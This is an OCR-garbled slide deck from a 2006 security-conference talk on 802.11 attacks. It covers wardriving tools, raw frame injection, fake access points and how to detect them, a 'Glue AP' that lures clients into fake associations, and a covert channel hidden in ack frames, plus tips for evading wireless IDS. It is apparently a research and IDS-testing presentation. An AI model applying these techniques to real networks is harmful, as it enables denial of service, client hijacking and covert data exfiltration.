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Who are we? o^ 



© Network security experts in R&D labs 

> Employed by France Telecom (major telco) 

© Speakers at security-focused conferences 

> ShmooCon, ToorCon, FIRST, EuroSec... 

© ShmooCon 2005 speakers ;-) 

> « Design and Implementation of a Wireless IDS » 
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Agenda & 



© State of the art of (some) useful 802.11 attacks 

> Starting with WiFi 101 

> Non exhaustive, we only have a one hour timeslot ;-) 

© Wireless frames and injection quick overview 

> Description of 802.11 frames 

> Description of raw injection 

© Let's present new stuff! 

> An enhanced Fake AP 
>AGlueAP 

> A covert channel 
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WIFI101 & 



© Different Modes 

> Managed (Client mode,) 

> Adhoc (IBSS / Independent Basic Service Set) 

> Master (ie AP mode) 

> Monitor © 

© Different "channels" 

© Different SSI D (networks) 

> Essid = network name 

> Bssid = Mac @ 
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WIF1 101: Different frames & 



© Management frames 

> Authentication / Deauthentication 

> Association / Disassociation 

> Beacon frame 

> Probe request / probe response 

© Control frames 

> RTS/CTS 

> Acknowledgement frame 

© Data frame 

Shmoocon'06 
France Telecom D5-i4/ovoe 

Recherche & Developpement 



Ethereal ^— ^ & 



You guys all know about ethereal, 



Easier to use under *Nix 



© http://www.ethereal.com/ 




Good 802.11 support (monitor mode) 
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Stumbler vs. Sniffer & 



© Sniffers like Ethereal, Tcpdump, or Kismet capture raw 
data frames. Kismet always operates in monitor mode, 
other sniffers can. Sniffers can see data packets. 

© Stumblers query the card firmware to see what networks 
are detectable in the area. They usually see fewer 
networks than sniffers, and can't capture data packets, 
but they don't require special drivers, either. 

(Thanks to Dragorn Kismet presentation) 
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Netstumbler ^ 



NETSTUMELER.COM 



© http://www.netstumbler.com/ 

© Current release: Netstumber 0.4 / MiniStumbler 0.4 

© Active monitoring (send empty probe request frame) 

> And do channel hopping 

> Can be configured with a GPS 

> To build map... 
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Screenshot 



NETSTUMELER.COM 
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KISMET A C >~ 

KISMET 

© Very famous tool 

© http://wwwMsmetunreless.net/ 

> Current release: Kismet-2005-08-Rl 

© Passive monitor (ie listen to beacon / probe response) 

> Also do channel hopping 

> Can use a GPS 
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Screenshot 
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WarDriving ot 



(►) Just listen for any IEEE 802.11 activity! 

> Stealth... 

© Or send Probe Requests and listen for Probe 
Responses... 

> Not stealth...;-) 
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WarDriving 





WarFlying 
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Defcon, a feu; years ago © 



&. 
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Definitions (1/2) & 



© A rogue access point 

> is a wireless access point that has been installed on a secure 
company network without explicit authorization from a local 
network management 

© A wireless intrusion detection system (WIDS) 

> is a network device that monitors the radio spectrum for 
the presence of unauthorized, rogue access points 

© Source: Wikipedia, the free encyclopedia 
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Definitions (2/2) & 



© No definition for 'fake access point' on Wikipedia 
© Could be (in bad english) ;-) 

> is an illegitimate wireless access point which purpose is to fool 
wireless users that usually connect themselves to legitimate access 
points 

© Could also be defined as 

> a security nightmare! 
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raw Injection (1/3) & 



© We mean layer 2 frame injection 

> 802.11 management, control and data frames 

> Could be extremely powerful! 

© Goal: inject any arbitrary frame 

> Userland tool gives it to the kernel/driver 

> Driver gives it to the firmware 

© Was really tricky 2 or 3 years ago... 

> Prism2/2.5/3 with HostAP was one of the only mean for frame injection 

> But with limitations (some 802.11 fields mastered by the firmware) 

-Fragmentation, sequence number, BSS timestamp... 
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raw Injection (2/3) & 

© Today a large choice of chipsets and drivers supports it 

> Prism2/2.5/3 with HostAP or wlan-ng 

> Prsim54 with prism54 

> Atheros with madwifi 

> Ralink RT2x00 with rt2x00 

> Realtek RTL8180 with rtl8l 80 

© Check Christophe Devine's aircrack for additional patches 
© Injection and sniffing are performed in 'monitor 7 mode 

> socket (PF_PACKET, SOCK_RAW, htons (ETH_P_ALL) ) 

> iwconf ig interface mode monitor 

> if conf ig interface up 
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raw Injection (3/3) & 



© Could be used by Wireless IDS for layer 2 countermeasures 

> One goal is to prevent wireless clients from associating to rogue 
access points 

-Thanks to deauthentication / deassociation floods 

© Could be used for tricky things 

> WEP cracking speedup (a la aircrack) 

> Denial of service, association floods 

> Fake access points and clients 

> And so on... 

© Drastically increased the range of feasible attacks... 
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(Big) Issue For Any Wireless IDS ^ 



Dealing with 'unuseful' data is a classic issue for any IDS 

> Data mastered by an attacker who intends to corrupt the WIDS 

raw injection is a key feature to corrupt any WIDS 

> Inserting arbitrary data in databases 

> Aggregating and correlating unuseful data 

> Flooding the GUI (and system administrators) © 

© A major challenge for any Wireless IDS vendor 

> How to deal with an attacker flooding at the wireless IDS? 
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fakeap.pl (1/4) & 



© You guys, know about infamous BlackAlchemy's Fake AP! 

> Available at: http://u;u;u;.blackalchemy.to/project/fakeap/ 

© Basically it's a perl script using if conf ig and iwconf ig 

> (Randomly) change BSSID, ESSID, channel, WEP and txpower 

> Feed it with an ESSID list and MAC prefixes 

© A wireless havoc for stumblers and wireless IDS 

> Filling tables and GUI with random fake access points 
© But... 
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f akeap . pi (2/4) & 



© As BSSIDs are randomized (and not cyclic), you may use 

> A timeout window to flush 'old' fake access points 

-Keep only those that are currently speaking 

© As the wireless card is in 'master' mode, all fields are 
mastered by the driver and firmware, especially 

> Sequence number 

> BSS Timestamp 

> Supported capabilities (tagged parameters) 

© So what? 
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f akeap . pi (3/4) & 



fakeap.pl could be detected 

> Load of ESSIDs with (sometimes) funny ones ;-) 

> Resetted BSS Timestamps* 

-A flood of low BSS timestamps from different sources is a clear sign of 
a fakeap.pl attack 

> (Sometimes) Resetted sequence numbers 

-At the beginning of the attack 

> Same tagged parameters for different beacons in a time period 

-Layer 2 fingerprinting of the attacker wireless card 

* hint from Josh u^t^toe 
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f akeap . pi (4/4) & 



(►) f akeap .pi pcap capture file 

© Take a look at BSS timestamps and tagged parameters... 



Fakeap.cap 
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Wireless IDS and Fake APs... & 



© Wireless IDS should have fakeap.pl detection engines 

> Latter slides show means to achieve a good level of detection 



But if the attacker has raw injection capabilities 

> It could be a severe hurt for Wireless IDS and stumblers 
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Important Notice! ^ 

© All code is in alpha/beta stage 

> Raw Fake AP is fully functional 

> Raw Glue AP is in alpha stage (need to be extensively tested) 

> Raw Covert is fully functional but quite unuseful without 
extended capabilities (file transfer, remote shell) 

© These tools were developed for 

> Wireless IDS testing 

> Proof-of-concept purposes 

> Showing how raw injection could be powerful! 

> Fun! ;-) 

© Will be released under the GPL license... 
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Raw Fake AP (1/7) &- 



What about raw injection in monitor mode? 

> Today, supported by (most) wireless chipsets, firmwares and drivers 

© Could help for a 'Raw Fake AP'... 

> A program that emulates IEEE 802.11 access points thanks to 
wireless raw injection 

> Only Probe Response and Beacon frames are supported 

> Going towards other management frames could lead to a (rather) 
complete Virtual AP... 

© Check for next slides... 
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Raw Fake AP (2/7) & 



® Some features 

> Raw injection of beacon and probe response frames in monitor mode 

> Try to forge coherent sequence numbers and BSS timestamps 

-(depending on driver injection capabilities) 

> Try to have a coherent time interval between beacons 

-(which is hard to achieve without a real time kernel) 

> Supports multiple capabilities advertisements 

-(cryptoprotocols like WPA/RSN, radio capabilities like data rates) 
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Raw Fake AP (3/7) <& 



© Should not be detected as a Fake AP attacks thanks to 

> Coherent BSS Timestamps and sequence numbers 

> Emulated access points will constantly speak 

© Will test your wireless IDS 

> Garbage data (invalid characters), high number of access points... 

> Becomes really hard for a wireless IDS to classify this as a Fake AP 
activity 

© Will hide your real networks from (novice) wardrivers 

> How to distinguish between valid and emulated access points? 

> Could be a countermeasure activated by a wireless IDS detecting 
wardriving activity ;-) 
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Raw Fake AP (4/7) & 



© Will fool passive and active stumblers / sniffers 

> Thanks to advertised beacons regularly sent 

> Thanks to probe responses sent back in responses to wireless clients 
probe requests 

© Beacon mode 

> Choose channel X 

> Send beacons of fake access points under channel X 

> Switch channel and so on... 

© Probe response mode 

> Wait on channel X for NULL probe requests 

> Send back probe responses of fake access points under channel X 

> Switch channel and so on... „ hmnnnnn , nR 
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Raw Fake AP (5/7) & 



© Command line interface will help you to choose 

> Randomize Open/WEP/WPA/RSN crypto 

> Randomize b/g cards 

> Channel hopping 

> TXpower hopping 

> Randomize ESSIDs (allnum or not) 

> Randomize BSSIDs 

> Choose beacon interval 

> Choose number of fake access points 

> Choose a file with valid OUIs 

> Choose a file with ESSIDs 

> Choose between beacon or probe response mode 

> Select a destination MAC address 
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Raw Fake AP (6/7) & 



© Proof-of-concept release 

> Lack of features (no configuration file defining fake access points) 

> Monolithic, non threaded... 

> Do not blame us for ugly coding style! 

> Originally designed to test Wireless IDS and stumblers 

© Released under the GPL licence 
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Raw Fake AP (7/7) & 



© Live demo! 
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""Connexion reseau sans fii 



r 



Gestion du reseau 



A Actualiser la lists des reseau* 



.^, Configurer un reseau sans fil pour la maison ou une petite 
entreprise 






Tiches apparentees 
.j j En savoir plus a propos des reseaux sans fil 



;■ > Modifier I'ordre des reseaux preferes 
V :> ModfierlesparamelresavanGes 
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Choi sir un reseau sans fil 



Cliquez sur un element dans la liste d-dessous pour vous connecter a un reseau sans fil a 
portee ou pour obtenir plus d'informations, 



r 
v 
r 



r 
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|V. Reseau sans fil securise 
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7 Reseau sans fil seourise {VVPA) 

G r§5 <§ £) %oKn0¥UV4nOX£9t □>.„* 

l L i' Reseau sans fil securise 
©•oZeHU&TKn 

j' Reseau sans fil securise 
D ■ " pD Ij'DC^AMG ihg® AU ^ioc 



Reseau sans fil securise (WPA) 
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Reseau sans fil securise 
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Raw Glue AP (1/6) & 

© A fact! 

> Wireless clients are often the weakest link of any wireless infrastructure 

> They connect to any network or preferred networks (cf. WZC slides) 

© Wireless IDS/IPS (usually) try to mitigate this by 

> Sending regularly deauthentication / deassociation floods to clients 
preventing them from associating to rogue access points 

© The purpose of this tool is trying to evaluate another option! 

> Catch them in a virtual quarantine area! 

© Cf. Attacking Automatic Wireless Network Selection, Dino A. 
Dai Zovi, Shane A. Macaulay 
http://www.theta44.org/karma/ sumo*™™ 
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Raw Glue AP (2/6) Si 



© What about a Virtual AP populating every ESSID? 

> Catch probe requests 

> Catch authentication and association requests 

©A kind of Glue AP! 

> Once caught, wireless clients may be associated during a certain 
time to a non existent access point! 

© Constraint 

> Use monitor mode in order to perform both countermeasures and 
detection 

> In order to (eventually) implement it within a wireless IDS/IPS 

Shmoocon'06 
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Raw Glue AP (3/6) Si 

© NULL probe requests are caught in order to deal with 
clients with automatic association to any ESSID 

> A probe response is sent back with chosen BSSID and ESSID 

© Probe requests with a ESSID are caught in order to deal 
with clients associating to preferred networks 

> A probe response is sent back with chosen BSSID and asked ESSID 

© Authentication request must be Acknowledged 

> And then answer by a successful authentication response 

© Association request must be Acknowledged 

> And then answer by a successful association response 

* ~ Shmoocon06 
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Raw Glue AP (4/6) Si 

© Proof-of-concept release 

> Not really tested © 

> Not adapted to real world: catch everyone! 

> Lack of features (no configuration file for ESSID/BSSID catching) 

> Monolithic, non threaded... 

> Do not blame us for ugly coding style! 

© Seems to work on some wireless drivers 

> Unstable results, need further improvements 

> Estimation of timeouts 

© Will only work on 'Open' mode 

> But Fake APs cannot be in authenticated mode! 

Shmoocon'06 
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Raw Glue AP (5/6) Si 



© Main difficulties to achieve 

> ack frames should be sent back within a (small) timeframe 
(depends on wireless drivers, usually 300 microseconds) 

> Keep-alive packets from the client must be supported 

© Coded in c for speed purposes 
© Will be released under GPL license 
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Raw Glue AP (6/6) Si 



© Live demo! 

Who has associated to 30 : 77 : 6E : 65 : 64 : 21? 
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Raw Covert Channel (1/8) & 



© Covert channel 

> In information theory, a covert channel is a communications 
channel that does a writing-between-the-lines form of 
communication. 

> Source: Wikipedia, the free encyclopedia 

© Writing between-the-lines 

> Use valid frames to carry additional information 

> Valid frames could be management, control or data frames 

© This tool is 'only 7 an example! Possibilities are infinite! 

Shmoocon'06 
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Raw Covert Channel (2/8) & 

© With 802.11, this may be performed by many means 

> Using a proprietary protocol within valid or invalid frames 

> It gives infinite possibilities thanks to raw injection 

© (Some) 802.11 frames are not considered as 'malicious 7 

> Control frames like ack are lightweight and non suspicious! 

-Frame control (16 bits) 
-Duration Field (16 bits) 
-Receiver Address (48 bits) 

> (Usually) not analyzed by wireless IDS 

-No source nor BSSID addresses ;-) 

© (Some) 802.11 drivers do not give back ack frames in 
monitor mode (managed in the firmware: e.g. HostAP) 

> Increasing stealthyness shmoocon-oe 
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Raw Covert Channel (3/8) & 



© How it works? 

> A client encodes the information and sends acks over the air 

> A server listens for acks and tries to decode the information 

© Basically, it uses a magic number in receiver address 

> 2 bytes 

© Basically, it encodes the covert channel in receiver address 

> 1 byte 

© Several ack frames are needed to send information 

Shmoocon'06 
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Raw Covert Channel (4/8) & 



© Issues 

> ack frames can be missed, wireless is not a reliable 
medium! ;-) 

> Detection may be performed (only) with anomaly detection 

© Proof-of-concept release 

> No enhanced features 

© Will be released under GPL license 
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Raw Covert Channel (5/8) & 



© Possible enhancements 

> Multiple encoding techniques 

> Encryption techniques 

> Remote shell 

> File transfer 

> Use invalid frames (see next slide) 
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Raw Covert Channel (6/8) & 



© Invalid frames (in the 802.11 sense, Le. proprietary frames) 

> But should be detected by any wireless IDS performing sanity check 
on every frame 

® FCS invalid frames 

> Should require driver/firmware modifications to inject bad FCS 

> Wireless IDSes do not analyze such bad frames 

> But should be detected with FCSerr statistics (even if harder to 
diagnose as a covert channel) 
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Raw Covert Channel (7/8) & 



© Invalid FCS monitoring 

> Usually a bit is set by the firmware when a FCS is invalid 

> Most drivers discard packets with bad FCS thanks to this information 

-hal_rxerr_crc for madunfi 
-rfmon_header->f lags & 0x01 for prism54 

> HostAP driver has a facility 

-prism2_param interface monitor_allow_fcserr 1 
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Raw Covert Channel (8/8) &- 



© Live demo! 

© Did you detected it? ;-) 
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Questions? 



Thanks for your attention 
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Tools: to be released at http://rfakeap.tuxfamily.org 
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